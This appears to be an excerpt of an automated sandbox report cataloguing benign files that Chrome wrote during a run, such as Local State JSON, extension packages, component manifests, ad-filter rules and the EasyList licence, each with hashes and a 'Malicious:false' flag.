                                                              Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291206129529003"},"plugins":{"metadata":{"adobe-flash-player":{"d
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):207994
                                                              Entropy (8bit):6.072255443143038
                                                              Encrypted:false
                                                              SSDEEP:6144:9U03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:9nCW8D2FmvoL
                                                              MD5:188FEB3462080707EB1131D501863DBF
                                                              SHA1:ADD3566B6EBC83074275CF0340CE3049DCE9C527
                                                              SHA-256:4A408F2AF7FD48496B1A9F48756FA7162BC189E53DE98B7847A9E2A67D9B4F87
                                                              SHA-512:178D666D6AAEE635F0F9E5A71565ABCA169C1643F63E1F5150FB639B42BE399DA1DAD0464F2AA1543BF3EA8B391B8BEE5D937D24C946B2CF847DA7398838E26E
                                                              Malicious:false
                                                              Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291206129529003"},"plugins":{"metadata":{"adobe-flash-player":{"d
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):207994
                                                              Entropy (8bit):6.072256637605032
                                                              Encrypted:false
                                                              SSDEEP:6144:FU03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:FnCW8D2FmvoL
                                                              MD5:801FC8D6CC0A7EBD956E86300E250E47
                                                              SHA1:BEEB2ADDEAEAA305ED93C096AF63DA047EB9E7AA
                                                              SHA-256:A61923AC1B2536A7B194903506F5457A6831D472A605BCB833653D6BF390D63D
                                                              SHA-512:0D535722BD551A045BBFBD81CC96DF3F0252B9E2DD1ACB7BF1AC1C41072A892DB3D0E1D6294C7FFAC6B555716946110FD09740CCB2F51D8D10D6067E0998862F
                                                              Malicious:false
                                                              Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245922715401452"},"plugins":{"metadata":{"adobe-flash-player":{"d
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):199553
                                                              Entropy (8bit):6.044287905636466
                                                              Encrypted:false
                                                              SSDEEP:6144:n03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:0CW8D2FmvoL
                                                              MD5:2BEFEAD84AFABFAFFEFD89DDE1868438
                                                              SHA1:38943C0029546993EE5D68E29AAA31EDBD191596
                                                              SHA-256:00921474ABA2E1E15398462507CE765024331A1FDE159992A25670F188BBC7F9
                                                              SHA-512:314A49169ECAFDCBEF4BD930B430BCB918A9DD91A24708A3ABE052264C4D0EDD11E23D5E7CC7B427719F3FA9A845E41063304BE5DCEF4B84B419D05BA14DA400
                                                              Malicious:false
                                                              Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291206129529003"},"plugins":{"metadata":{"adobe-flash-player":{"d
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:Google Chrome extension, version 3
                                                              Category:dropped
                                                              Size (bytes):248531
                                                              Entropy (8bit):7.963657412635355
                                                              Encrypted:false
                                                              SSDEEP:3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
                                                              MD5:541F52E24FE1EF9F8E12377A6CCAE0C0
                                                              SHA1:189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
                                                              SHA-256:81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
                                                              SHA-512:D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
                                                              Malicious:false
                                                              Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f|.~.c.4.E.......0..0...*.H............0.......).'..b.*$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$|..|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...|!..A..L.+.=...kP.!.1..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:Google Chrome extension, version 3
                                                              Category:dropped
                                                              Size (bytes):145035
                                                              Entropy (8bit):7.995615725071868
                                                              Encrypted:true
                                                              SSDEEP:3072:TdgEhmDf+E8VY0x81Rkc6L2oqzqkPEu30gZlc3G2ZknF:TyEhmDf+/+Fnkj6lEukgZyyF
                                                              MD5:EA1C1FFD3EA54D1FB117BFDBB3569C60
                                                              SHA1:10958B0F690AE8F5240E1528B1CCFFFF28A33272
                                                              SHA-256:7C3A6A7D16AC44C3200F572A764BCE7D8FA84B9572DD028B15C59BDCCBC0A77D
                                                              SHA-512:6C30728CAC9EAC53F0B27B7DBE2222DA83225C3B63617D6B271A6CFEDF18E8F0A8DFFA1053E1CBC4C5E16625F4BBC0D03AA306A946C9D72FAA4CEB779F8FFCAF
                                                              Malicious:false
                                                              Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b..........S'.....2.{.....'....+.'.."..Y.x.ISa...)....H.&92..?!..~..F.5."...n,.B.-|\.)..(..... ]G..j.-M)....C......o&L..0.K.....UtP.&.N...;..^w/a{)v...~KG;...?.1...k.c..D.U......J.6.`.G.5.x.k..[...i.A.@I^..I.<A. J...j.'.G.`.$q.N..Tdq]2]p.OF..#.#......'....8.3......0.."0...*.H.............0.............O..(...':19..O/.>....=.....m.n\.z..q.....JW..F......+H.Z+KGO.9....8.....U...&.y....,$...?.Eo.....\f/.Z..+M8...B.3'..Y.r...X.AS?.~..k..n....... Z...&.G....."n..........l.0v.x#<....Lx,-.w..-..d.....J.pT..('e~*{%kQ.Q......rI.....Z....v.N.....J.d_......rX.......w@.b.[.c../V.'c...!.~.k..}z...U.S..nC......@.......Y..#.D.z.....5&.1O...X=p..2.F..P.6yP..>{.....HBX.*.E5....y..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):1765
                                                              Entropy (8bit):6.027545161275716
                                                              Encrypted:false
                                                              SSDEEP:48:p/hii6zkvVI1Jip2qRNHvakuQkCNFxdsGwmBKkgum91:Rz0kv6cNvaYNFwSEhug
                                                              MD5:45821E6EB1AEC30435949B553DB67807
                                                              SHA1:B3CADEB17FE5B76B5DBB428B8D3A07B341F8B1BC
                                                              SHA-256:E5FAE91295BECF7F66BFA4BE1061CA5537ED763EB5D01485F23ECFB583304FEE
                                                              SHA-512:BCBE40CAFAA4B14566D91E361D8FB7F0288D5C459FA478AA4C575444DA4D406E1076FC0B3A31D4A9E5EE034F0FE15A0EFE8A8A52B838DE94B96D3E488D28F0FE
                                                              Malicious:false
                                                              Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJSZWNvdmVyeS5jcngzIiwicm9vdF9oYXNoIjoiaGdCR051SzhNR2NKaDlfNmZQaFdEWmpVYUFKeklzeDlJS21DUEZvb0dfUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiIwYXduVFBFQmdDRHkyV05hVVk3Um9mSWN3c3ZwNHFRNUxzZVMxVXRiVXY0In1dLCJmb3JtYXQiOiJ0cmVlaGFzaCIsImhhc2hfYmxvY2tfc2l6ZSI6NDA5Nn1dLCJpdGVtX2lkIjoiaWhubGNlbm9jZWhnZGFlZ2RtaGJpZGpobmhkY2hmbW0iLCJpdGVtX3ZlcnNpb24iOiIxLjMuMzYuMTQxIiwicHJvdG9jb2xfdmVyc2lvbiI6MX0","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"iFuMX_kOZ-zJ7KVu6Lxb3rHWZgQvkZhv25x_SGlBiDV_okALrGbj6rUOWyNNNsHXMnT118XZmA696XR8qkr4dwT5Gvez-9gi-WYBY7XBkgo7v6NspGgJF89BNCeI-P9k-zBHOGgrf-fCEiAcoM7xCx9_f8qlRy7nhQPyjOIHn5eEJEir0uSu6gdqR9afnVZ3UoR-VOLdOBt7fA4ee38MP2ut5qWU50F5dvIezfKkTVDMHwztvcLCy6R9SVkdSYv6jwWGccYRl-aclvkkHu6SnbZGI7fmDZdkcBAxBHYEZZMmvb76ro4SO15GDyEVAo_Qf4trdrY_GyN_Bm73imCTjgtoGc
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):66
                                                              Entropy (8bit):3.7900469623255675
                                                              Encrypted:false
                                                              SSDEEP:3:SpOXzxlQ4BdPWfDL9c:SpOjDQFfVc
                                                              MD5:2AE14F91312C4E8034366B09D49D5B18
                                                              SHA1:AD4933A5D838D0FA0B960C327A5039A9E8249642
                                                              SHA-256:4F122332EF0F2BB490EF59619D3602C1A7277C0A7A19C132202DB4803A09BFA2
                                                              SHA-512:FB0CC467A4B8463F6A3BF42CDC11C23B34EB94A9397644B68714DCB819EE326BAE05022D59D23DC9907DF1E6928064D853FD0900BB6083417892D4D5A9BA7716
                                                              Malicious:false
                                                              Preview:1.aeedb246d19256a956fedaa89fb62423ae5bd8855a2a1f3189161cf045645a19
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):195
                                                              Entropy (8bit):4.682333395896383
                                                              Encrypted:false
                                                              SSDEEP:3:rR6TAulhFphifFJ9LAG9Xg0XTFHqS1wP/pEeSWU4pv/8F/FxLj2RF2fcTZTotL:F6VlM90ggITgS1wnuWfB0NpK4aotL
                                                              MD5:7A8E3A0B6417948DF4D49F3915428D7A
                                                              SHA1:4FC084AABDB13483567D5C417C7ED8FD16726A80
                                                              SHA-256:D1AC274CF1018020F2D9635A518ED1A1F21CC2CBE9E2A4392EC792D54B5B52FE
                                                              SHA-512:064D84A57B28C19AD10742859DA493D0826B47ADC632F6C623DFB4DE36D72A9D29BE98518061A9FFD42D99FCF01F27DE39CE74782B3A5ACBBE11DFDDEEAB59A1
                                                              Malicious:false
                                                              Preview:{. "manifest_version": 2,. "name": "ImprovedRecoveryComponentInner",. "version": "1.3.36.141",. "imageName": "image.squash",. "squash": true,. "fsType": "squashfs",. "isRemovable": false.}
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):97968
                                                              Entropy (8bit):5.489893397464442
                                                              Encrypted:false
                                                              SSDEEP:1536:ojHlFMJw9iI9Yh9FHc6cPC3CpBHTrDo630a8Q78xRAQudDv4NZ/p2GuN+BO1:6FMJw9v9efHc6cPCURDR30EYnAQuJANw
                                                              MD5:3846A25BC9191585763E06550798BAB1
                                                              SHA1:F43D903B13AB969E2276E304795CE164F22F893C
                                                              SHA-256:C7D5D133E8F995D3E4D5B68F28BE0D7B1F290DFBD1502E0EC260142325FA8F88
                                                              SHA-512:6B1E1776DE4B4B7D7BD7E6252F555AD84CC689EFE1F3920B3ACFE23DE65212254FC219E0A530037A5EA819894BC2F5B85ECFC0ADDEE9AF3163393AA32F97BA44
                                                              Malicious:false
                                                              Preview:............0.8.@.R.-728x90...........0.8.@.R.adtdp.com^..........0.8.@.R.yomeno.xyz^.:........*...adcore.com.au..*...adcore.ch..0.8.@.R./adcore_..........0.8.@.R.uwoaptee.com^.8......*...safeway.com0.8.@.R.fwcdn2.com/js/embed-feed.js..........0.8.@.R._468_60..3........0.8.@.R#/wp-content/plugins/wp-super-popup/.9........0.8.@.R)bancodevenezuela.com/imagenes/publicidad/..........0.8.@.R..adbutler-..........0.8.@.R.adrecover.com^..........0.8.@.R.hdbcode.com^.?........*...google.com0.8.@.R!developers.google.com/google-ads/.-........*...konograma.com..0.8.@.R./adserver...........*...vk.com0.8.@.R.vk.me/css/al/ads.css.,........0.8.@.R.mysmth.net/nForum/*/ADAgent_..........0.8.@.R.indoleads.com^.%......0.8.@.R.discordapp.com/banners/.E........*...daum.net0.8.@.R)daumcdn.net/adfit/static/ad-native.min.js.(........0.8.@.R.looker.com/api/internal/.#........0.8.@.R.broadstreetads.com^..........0.8.@.R./banner.cgi?...........*...thefreedictionary.com*...downloads.codefi.re*...windows7themes.net
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):24623
                                                              Entropy (8bit):4.588307081140814
                                                              Encrypted:false
                                                              SSDEEP:384:mva5sf5dXrCN7tnBxpxkepTqzazijFgZk231Py9zD6WApYbm0:mvagXreRnTqzazWgj0v6XqD
                                                              MD5:D33AAA5246E1CE0A94FA15BA0C407AE2
                                                              SHA1:11D197ACB61361657D638154A9416DC3249EC9FB
                                                              SHA-256:1D4FF95CE9C6E21FE4A4FF3B41E7A0DF88638DD449D909A7B46974D3DFAB7311
                                                              SHA-512:98B1B12FF0991FD7A5612141F83F69B86BC5A89DD62FC472EE5971817B7BBB612A034C746C2D81AE58FDF6873129256A89AA8BB7456022246DC4515BAAE2454B
                                                              Malicious:false
                                                              Preview:EasyList Repository Licences.... Unless otherwise noted, the contents of the EasyList repository.. (https://github.com/easylist) is dual licensed under the GNU General.. Public License version 3 of the License, or (at your option) any later.. version, and Creative Commons Attribution-ShareAlike 3.0 Unported, or.. (at your option) any later version. You may use and/or modify the files.. as permitted by either licence; if required, "The EasyList authors.. (https://easylist.to/)" should be attributed as the source of the.. material. All relevant licence files are included in the repository..... Please be aware that files hosted externally and referenced in the.. repository, including but not limited to subscriptions other than.. EasyList, EasyPrivacy, EasyList Germany and EasyList Italy, may be.. available under other conditions; permission must be granted by the.. respective copyright holders to authorise the use of their material.......Creative Commons Attribut
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):1529
                                                              Entropy (8bit):5.993915630498445
                                                              Encrypted:false
                                                              SSDEEP:24:pZRj/flTHYfcl5kYbKqLjeT3azkaoX1pF/kSYYRVHbo0doXxOB6G6QL3foQ3QL5D:p/h4ElBbKdTakak1pFcSfRV7o0dkx8L4
                                                              MD5:6B2EDD2D0C16E5D77BD2C3E4AE88C95F
                                                              SHA1:BC82982FA8A04FA6FD9F17DA03D443A57E0F78D4
                                                              SHA-256:CA0F5F75FC56FBEDA7522B2C83707A451D01760F417C497A37C70554E290B737
                                                              SHA-512:533026A33030795ABF24B6E78D26763734D98CA74BFA4FAC2073EFAD0BB5CA1C38E7036BEAF17E6ABBFE56CF968E80EB3CA3CFD23AEEC10CE1280E8DB1C4078C
                                                              Malicious:false
                                                              Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJGaWx0ZXJpbmcgUnVsZXMiLCJyb290X2hhc2giOiJMTF90X0NkWWRYUnpMSHJBZ3hmUW5tcENTaXlkWEtzVVlJZnZjLTR0czRBIn0seyJwYXRoIjoiTElDRU5TRS50eHQiLCJyb290X2hhc2giOiIyaWswNmk0TFlCdVNHNWphRGFIS253NE9pdnVSRzZsQ0JKMVk0TGtzRFJJIn0seyJwYXRoIjoibWFuaWZlc3QuanNvbiIsInJvb3RfaGFzaCI6Imo4MmhRZGhaa0MwMjFWOEZ1MHUtMExvMnVJdXI5SzdFem5JcHE3WHd2YlkifV0sImZvcm1hdCI6InRyZWVoYXNoIiwiaGFzaF9ibG9ja19zaXplIjo0MDk2fV0sIml0ZW1faWQiOiJnY21qa21nZGxnbmtrY29jbW9laW1pbmFpam1tam5paSIsIml0ZW1fdmVyc2lvbiI6IjkuMzYuMCIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"VM_rIA1uXuXjbhz_uZ8uQp9F3FfgEgGTjCXL08Q_jrGXXH-Yty1DqAw4yzWsadeOjVRozUf_7kBrYJ2U8Y8slircdLRbrqJejQeyyrJx4HFT8qgZEb60YHdsOd76C57YzF5dXErpjT7_FkWA41lTxLQvdWbACMO0DE7uOHO9mZx5pM98Ni9GsM_yxJbRSyDZWa8BdPHErfMuO6YE6D8tbnYTr2tXcMV9p2ZEAFMiso2B-6DSr
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):66
                                                              Entropy (8bit):3.9458563396006063
                                                              Encrypted:false
                                                              SSDEEP:3:SWllBTGVn1VJ8U1hRGGpWdTdSATn:SWNT+eKhRR4dTVT
                                                              MD5:991F44CE02222E783A1FEFE4187727CE
                                                              SHA1:9855D1CA0338ADCD5829C3260BF7FAAF88A23509
                                                              SHA-256:58704ADE087671AA1226BC9CEC1719F5B80B90C571EF747812A64458BBEA0F50
                                                              SHA-512:C2616426939B235620A22B24A9BEC6D4F7DBB695C812F1784A4C95B41E53A21F371A6C440177CFABDE47E203EB83269F9013FC75C6D758EA6FDFE7B52B4A554E
                                                              Malicious:false
                                                              Preview:1.34ff2e9d7a7ce81c5d760d4b0f4b59a0237dd5db0d1e84ccd5103a30687eac17
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):115
                                                              Entropy (8bit):4.563301657145084
                                                              Encrypted:false
                                                              SSDEEP:3:rR6TAulhFphifFHXG7LGMdv5HcDKhtUJKS1Avn:F6VlMZWuMt5SKPS1Avn
                                                              MD5:47B89067C397B3EABBD04E6FC4008B71
                                                              SHA1:7B4E623806D7EA8BFCD2FE6836A21E50C9F9340E
                                                              SHA-256:8FCDA141D859902D36D55F05BB4BBED0BA36B88BABF4AEC4CE7229ABB5F0BDB6
                                                              SHA-512:FDA1CE8EB24A05F65E8132248EEF96C422E5AA2D3254B590FBFD3FCB2016E3B7F6E4B53702D88E1695D4BEC0175F72EB4256CDAA2FF72DDF4390D480D04BA373
                                                              Malicious:false
                                                              Preview:{. "manifest_version": 2,. "name": "Subresource Filtering Rules",. "ruleset_format": 1,. "version": "9.36.0".}.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:L:L
                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                              Malicious:false
                                                              Preview:.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:Google Chrome extension, version 3
                                                              Category:dropped
                                                              Size (bytes):248531
                                                              Entropy (8bit):7.963657412635355
                                                              Encrypted:false
                                                              SSDEEP:3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
                                                              MD5:541F52E24FE1EF9F8E12377A6CCAE0C0
                                                              SHA1:189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
                                                              SHA-256:81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
                                                              SHA-512:D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
                                                              Malicious:false
                                                              Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f|.~.c.4.E.......0..0...*.H............0.......).'..b.*$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$|..|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...|!..A..L.+.=...kP.!.1..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):796
                                                              Entropy (8bit):4.864931792423268
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJMLkSlwZGGMLkSlwZ+WYpU34f145Gb+dgoxTyO8ZpU34f1L0frhmJ03OyZnLt:1HE7n4gn8WYpYrbhz8ZpotHOGAOf6aD
                                                              MD5:6F8E288A9AD5B1ED8633B430E2B4D4CA
                                                              SHA1:F671D3D4BEFA431D1946D706F4192D44E29B6F08
                                                              SHA-256:A114E2783D0E9B12155017323BA70838F0F82A71C7EE8DC1F115AE36991241F8
                                                              SHA-512:0F87F3F0D115B872288949E59ACD3CD41B1FBC64A622D8FDA6D71FAFC5A900D92ADFBB0E7EB926F2A8759BBAA0896D48728FB719BBF5EF54AC21027328F7700C
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "........ . ... ........ .. Chrome".. },.. "app_name": {.. "message": "........ . ... ........ .. Chrome".. },.. "craw_app_unavailable": {.. "message": "........... .... ...... .. .............".. },.. "craw_connect_to_network": {.. "message": "...., ........ .. . ......".. },.. "iap_unavailable": {.. "message": "........... .... ...... .. .......... ....... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "...., ...... . Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):675
                                                              Entropy (8bit):4.536753193530313
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJ0gbbGG0gbb+WYpU34g3YbiLO+dgyGFoO8ZpU34+puiPmb03OyZnLAOfTYABk:1HE5baib6WYpm31Lt0Z8Zp8pxOGAOfKD
                                                              MD5:1FDAFC926391BD580B655FBAF46ED260
                                                              SHA1:C95743C3F43B2B099FEBEBC5BD850F0C20E820AC
                                                              SHA-256:C67898B67F9C9209EAFDA6532B62D5789863CFB855998DD6A70E7775316CEC20
                                                              SHA-512:39D95D45C5746DA3BAA7AE6A3344EA17D7A7C3569C2A56959FF119261DA08C747A320FCF701AC72B8DBDBF8BF06FD8B239017A282CDDA444F3826D4EC672CBB4
                                                              Malicious:false
